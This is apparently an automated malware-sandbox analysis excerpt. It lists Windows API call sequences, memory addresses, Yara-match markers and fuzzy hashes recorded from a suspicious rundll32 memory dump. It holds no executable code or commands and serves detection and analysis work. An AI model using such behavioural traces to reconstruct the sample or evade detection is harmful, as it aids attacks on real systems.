                              • GetLastError.KERNEL32(?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA91
                              • HeapFree.KERNEL32(00000000,05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BAA4
                              • CloseHandle.KERNEL32(05940971,?,00000001,?,05940971), ref: 0594BAB6

                              APIs
                              • SetEvent.KERNEL32(00000000,?,0594507B), ref: 0593DC56
                                • Part of subcall function 05945D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 05945D59
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0594507B), ref: 0593DC76
                              • CloseHandle.KERNEL32(00000000,?,0594507B), ref: 0593DC7F
                              • CloseHandle.KERNEL32(00000000,?,?,0594507B), ref: 0593DC89
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0593DC91
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0593DCA9
                              • Sleep.KERNEL32(000001F4), ref: 0593DCB8
                              • CloseHandle.KERNEL32(00000000), ref: 0593DCC5
                              • LocalFree.KERNEL32(?), ref: 0593DCD0
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0593DCDA

                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05933DA2,00000000,00000001,?,?,?), ref: 0593DD92
                              • lstrlen.KERNEL32(?), ref: 0593DDA2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DDD6
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0593DE01
                              • memcpy.NTDLL(00000000,?,?), ref: 0593DE20
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593DE81
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0593DEA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID: W
                              • API String ID: 3204852930-655174618
                              • Opcode ID: c40fac72c85ca577ea55fa156ec7426262277a3e502efab72a6e6e7424cb76b8
                              • Instruction ID: d5610c6971d9a606191db4ed7f5e01925da0d8ca656c0c99eeb7cc7cb18d1c2e
                              • Opcode Fuzzy Hash: c40fac72c85ca577ea55fa156ec7426262277a3e502efab72a6e6e7424cb76b8
                              • Instruction Fuzzy Hash: 31414C7190430AEFCF11DFA4CC85AAEBFB9FF54284F144429E905A7211E730DA689BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0593D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 0593D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                                • Part of subcall function 0593D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0593A153
                              • wsprintfA.USER32 ref: 0593A181
                              • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0593A1DF
                              • GetLastError.KERNEL32 ref: 0593A1F6
                              • ResetEvent.KERNEL32(?), ref: 0593A20A
                              • ResetEvent.KERNEL32(?), ref: 0593A20F
                              • GetLastError.KERNEL32 ref: 0593A227
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                              • String ID: `
                              • API String ID: 2276693960-1850852036
                              • Opcode ID: 0d90f16a070a6695db475f5e939ab830fa585735c2c68ff90b049e2aaec1f861
                              • Instruction ID: a27454da61cd6387d28bede35b36543df33bf7b2eb67e1a7e6a9ca4f2a200c1b
                              • Opcode Fuzzy Hash: 0d90f16a070a6695db475f5e939ab830fa585735c2c68ff90b049e2aaec1f861
                              • Instruction Fuzzy Hash: E1416C71500209EFDF11DFA5DD8AFAEBBB9FF44310F004425F846921A0DB31AA64CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                              • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                              • memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                              • memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                              • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                              • GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                              • HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: d0527d93e9e844844a68ec3d8c1eb147813a7453f98d71552165fac227bf3f5e
                              • Instruction ID: b2b208044bbeb755e93d032b9a44e3e70ff35ae2be6c44c106d82e384c5d5568
                              • Opcode Fuzzy Hash: d0527d93e9e844844a68ec3d8c1eb147813a7453f98d71552165fac227bf3f5e
                              • Instruction Fuzzy Hash: FC31B135914309EFDB21CFA5DD46AABBFB9FB44751F044825FD0AD2201E7309A64DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL ref: 05947777
                              • memset.NTDLL ref: 0594778B
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • GetCurrentThreadId.KERNEL32 ref: 05947818
                              • GetCurrentThread.KERNEL32 ref: 0594782B
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 059478D2
                              • Sleep.KERNEL32(0000000A), ref: 059478DC
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05947902
                              • HeapFree.KERNEL32(00000000,?), ref: 05947930
                              • HeapFree.KERNEL32(00000000,00000018), ref: 05947943
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                              • String ID:
                              • API String ID: 1146182784-0
                              • Opcode ID: c9b96d081ebfdeef65dc5b7fbd387140e2386752d6053f30f97eca02354e6998
                              • Instruction ID: d6237b2291dfd1618383b00ded5d1e74e323e6ae94462a4dac63d3df7438815d
                              • Opcode Fuzzy Hash: c9b96d081ebfdeef65dc5b7fbd387140e2386752d6053f30f97eca02354e6998
                              • Instruction Fuzzy Hash: 6E5148B1618305AFE710EF64D985C2ABBE8FB88254F004D2DF585D7210DB30ED598F96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0594284F
                              • memset.NTDLL ref: 05942860
                              • lstrcmpi.KERNEL32(?,?), ref: 059428A0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 059428CC
                              • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05948974), ref: 059428E0
                              • memset.NTDLL ref: 059428ED
                              • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05942906
                              • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05942929
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05948974), ref: 05942946
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: c536b945f18687cefbb462bcf6a7d78cf0cf6ad08494e4747b786820e6263fd0
                              • Instruction ID: 296bcb54ceffa997813f00ccf9a10a536f64c328c0b27dd233f8541ba4ea016e
                              • Opcode Fuzzy Hash: c536b945f18687cefbb462bcf6a7d78cf0cf6ad08494e4747b786820e6263fd0
                              • Instruction Fuzzy Hash: 9A418B76A04209EFDF10CFA4CD85F9DBBB9FB48214F104129F909A7250EB35AE548F50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594C9CC
                              • lstrlen.KERNEL32(?), ref: 0594C9D4
                              • lstrlen.KERNEL32(?), ref: 0594CA3F
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CA6A
                              • memcpy.NTDLL(00000000,00000002,?), ref: 0594CA7B
                              • memcpy.NTDLL(00000000,?,?), ref: 0594CA91
                              • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0594CAA3
                              • memcpy.NTDLL(00000000,059553E8,00000002,00000000,?,?,00000000,?,?), ref: 0594CAB6
                              • memcpy.NTDLL(00000000,?,00000002), ref: 0594CACB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$lstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 3386453358-0
                              • Opcode ID: 129cd31ef00c9cf59455f528db51333482446d14600245ee32b95b968319274b
                              • Instruction ID: 3ebf4512a55246d40f998b5b7eac88217d450e818290d54bffbbfc933df30432
                              • Opcode Fuzzy Hash: 129cd31ef00c9cf59455f528db51333482446d14600245ee32b95b968319274b
                              • Instruction Fuzzy Hash: 8C413972D11209EFCF00CFA8CC85A9EBBB9FF48254F154456E909A3201E771EA60DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059360AC
                              • lstrlen.KERNEL32(00000008,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360BB
                              • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 059360CD
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360DD
                              • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360EF
                              • lstrcpy.KERNEL32(00000020), ref: 05936121
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0593612D
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 05936185
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 3746371830-0
                              • Opcode ID: 06e95f80d8136f3fcbf6ff002072650c3eb6dfc300eda2554baad3e557107a1c
                              • Instruction ID: 86c04e0e0aeafc280818800c4d3b406920ddc8dd86f9a2144242b89df6e69b70
                              • Opcode Fuzzy Hash: 06e95f80d8136f3fcbf6ff002072650c3eb6dfc300eda2554baad3e557107a1c
                              • Instruction Fuzzy Hash: BA416971514705EFCB228FA4D94AB6ABFFAFF48311F108519F80A97211DB70A964CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05945119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0594514B
                                • Part of subcall function 05945119: HeapFree.KERNEL32(00000000,00000000,?,?,0594FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 05945170
                                • Part of subcall function 059479A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0594FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 059479DC
                                • Part of subcall function 059479A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0594FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05947A2F
                              • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FC63
                              • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FC6B
                              • lstrlen.KERNEL32(?), ref: 0594FC75
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594FC8A
                              • wsprintfA.USER32 ref: 0594FCC6
                              • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0594FCE5
                              • HeapFree.KERNEL32(00000000,?), ref: 0594FCFA
                              • HeapFree.KERNEL32(00000000,?), ref: 0594FD07
                              • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FD15
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                              • String ID:
                              • API String ID: 168057987-0
                              • Opcode ID: 209e9dab163c8dec856b1a7523de41877556dca531095991eb45c6d5df9c9208
                              • Instruction ID: a2865fa18201f31137d97bf00ffe0ec462b529f540090b242ee19fdb86f15481
                              • Opcode Fuzzy Hash: 209e9dab163c8dec856b1a7523de41877556dca531095991eb45c6d5df9c9208
                              • Instruction Fuzzy Hash: CC317E31618315AFC711AFB4DC45E6BBFA9FF88710F01092AB944D6251DB709C289B96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                              • GetLastError.KERNEL32 ref: 0593F3E5
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                              • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                              • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                              • SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                              • GetLastError.KERNEL32 ref: 0593F483
                              • CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: 78fb0f95434b619f97aa9aa688b0ee746cd03c235d51eda653fd9775e8210c8a
                              • Instruction ID: cea809375cd0c72cbc311de36bbeadbc900926fd973e80455ae0c091362ac5e0
                              • Opcode Fuzzy Hash: 78fb0f95434b619f97aa9aa688b0ee746cd03c235d51eda653fd9775e8210c8a
                              • Instruction Fuzzy Hash: E7316971904208FFEB109FA9DC4EBAEBFB9FF04325F208150F915A61E1C7749A648B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,05935674,00000008,?,00000010,00000001,00000000,0000003A), ref: 059506AC
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 059506E0
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 059506E8
                              • GetLastError.KERNEL32 ref: 059506F2
                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0595070E
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05950727
                              • CancelIo.KERNEL32(?), ref: 0595073C
                              • CloseHandle.KERNEL32(?), ref: 0595074C
                              • GetLastError.KERNEL32 ref: 05950754
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: ca041f5f5494f0874a2137926dd5df52dab7e2a6aa39b81057a194723ea825de
                              • Instruction ID: 196a9c4a5d445f3a8a02353398f1e765e28e7a93fd213cfc8e38ccab038c1b88
                              • Opcode Fuzzy Hash: ca041f5f5494f0874a2137926dd5df52dab7e2a6aa39b81057a194723ea825de
                              • Instruction Fuzzy Hash: DD212B75915218BFCB019FA5DC8D9EEBF7AFB44321B058412F90AD6141DB308A64CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05941C25
                              • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05941C3B
                              • _snwprintf.NTDLL ref: 05941C60
                              • CreateFileMappingW.KERNEL32(000000FF,0595A1E8,00000004,00000000,00001000,?), ref: 05941C7C
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941C8E
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05941CA5
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05941CC6
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941CCE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: 403806a26e4cde554ec52381d88b14dab9951542c650deba68234f0e76cff70a
                              • Instruction ID: 79ac1753692f42509dd3948fb674740b6907795c6e0d71c538ff9b7e5fccf7ed
                              • Opcode Fuzzy Hash: 403806a26e4cde554ec52381d88b14dab9951542c650deba68234f0e76cff70a
                              • Instruction Fuzzy Hash: BB2102B2604304BBC721EF64DC06F9E7BB9AB84761F214021FA0AE7280EB709955DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(00000000,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,00000000,00000000,00000000), ref: 0594CC58
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0594CC7B
                              • lstrcatW.KERNEL32(00000000,00000000), ref: 0594CC83
                              • lstrlenW.KERNEL32(00000000,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?), ref: 0594CCCE
                              • memcpy.NTDLL(00000000,?,?,?), ref: 0594CD36
                              • LocalFree.KERNEL32(?,?), ref: 0594CD4F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                              • String ID: P
                              • API String ID: 3649579052-3110715001
                              • Opcode ID: 1a8323d23b08238d15e957c544e3e7a206fd602fb08d2b51828d2d35acaf38aa
                              • Instruction ID: 1c277a78914a8be82b92b1973c011fd9b2c52f50a9a64e290adfa699ffbc67d8
                              • Opcode Fuzzy Hash: 1a8323d23b08238d15e957c544e3e7a206fd602fb08d2b51828d2d35acaf38aa
                              • Instruction Fuzzy Hash: CD615971A0520AAFDF11EFA8CC8ADAEBBBDFF85204B054425F505A7210DB34AE15CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0595148E: InterlockedIncrement.KERNEL32(00000018), ref: 059514DF
                                • Part of subcall function 0595148E: RtlLeaveCriticalSection.NTDLL(05F3C378), ref: 0595156A
                              • OpenProcess.KERNEL32(00000410,B8F475FF,05942289,00000000,00000000,05942289,0000001C,00000000,00000000,?,?,?,05942289), ref: 0594C5BD
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,05942299,00000104,?,?,?,05942289), ref: 0594C5DB
                              • GetSystemTimeAsFileTime.KERNEL32(05942289), ref: 0594C643
                              • lstrlenW.KERNEL32(C78BC933), ref: 0594C6B8
                              • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0594C6D4
                              • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0594C6EC
                                • Part of subcall function 0593F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0593F384
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                              • String ID: o
                              • API String ID: 2541713525-252678980
                              • Opcode ID: d1e1adc13fae15c0e1940f109fb82051f70c34e5852da463bf6fc2ff1f7d7c6d
                              • Instruction ID: 2f8b90ab17d6d01d3b0049c395263d4567f6294b1de1019c188a0f191fcbc6fe
                              • Opcode Fuzzy Hash: d1e1adc13fae15c0e1940f109fb82051f70c34e5852da463bf6fc2ff1f7d7c6d
                              • Instruction Fuzzy Hash: 0C516B71615706EFDB21DF64D889FAABBA8FF08704F144529E90AD7240EB70ED908F94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0593A391
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0593A3BD
                              • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0593A3CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0593A405
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0593A427
                              • GetShellWindow.USER32 ref: 0593A436
                                • Part of subcall function 05942986: GetShellWindow.USER32 ref: 059429A4
                                • Part of subcall function 05942986: GetVersion.KERNEL32 ref: 05942A46
                                • Part of subcall function 05942986: GetVersion.KERNEL32 ref: 05942A54
                              • GetLastError.KERNEL32(?), ref: 0593A521
                              • CloseHandle.KERNEL32(?), ref: 0593A535
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                              • String ID:
                              • API String ID: 2436285880-0
                              • Opcode ID: f6e8943524cd7c108bbb30f05559a1181551f8e7d90e3b021d9bbb26f6fc99e9
                              • Instruction ID: f1d7bf4a82c803f2e0c723740728af32355ebf3bd0d1dcc82af1ff81cce1f7e0
                              • Opcode Fuzzy Hash: f6e8943524cd7c108bbb30f05559a1181551f8e7d90e3b021d9bbb26f6fc99e9
                              • Instruction Fuzzy Hash: BB7124B1508345EFDB10EFA4C88996FBBEDFB88254F004A2EF595D7290D730D9458BA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05937AA6
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05937ABE
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937B20
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05937B34
                              • WaitForSingleObject.KERNEL32(00000000,?,059487CC,?,?), ref: 05937B86
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BAF
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BBF
                              • RegCloseKey.ADVAPI32(?,?,059487CC,?,?), ref: 05937BC8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 3503961013-0
                              • Opcode ID: 68de8cc78209596b917b6d935b9293fb6798e27e8548352db670b0c5a5d42ad5
                              • Instruction ID: a70f3e7adbc368ffc72b1d52d5f453ba3ab88b7fd6ced14e1874fee890d12daf
                              • Opcode Fuzzy Hash: 68de8cc78209596b917b6d935b9293fb6798e27e8548352db670b0c5a5d42ad5
                              • Instruction Fuzzy Hash: E64190B5D14219EFDF019FE4C8868EEBFBEFF08215F10846AE515A2211D7354AA8DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0593A1A1), ref: 0593AAC5
                              • wsprintfA.USER32 ref: 0593AAED
                              • lstrlen.KERNEL32(?), ref: 0593AAFC
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • wsprintfA.USER32 ref: 0593AB3C
                              • wsprintfA.USER32 ref: 0593AB71
                              • memcpy.NTDLL(00000000,?,?), ref: 0593AB7E
                              • memcpy.NTDLL(00000008,059553E8,00000002,00000000,?,?), ref: 0593AB93
                              • wsprintfA.USER32 ref: 0593ABB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
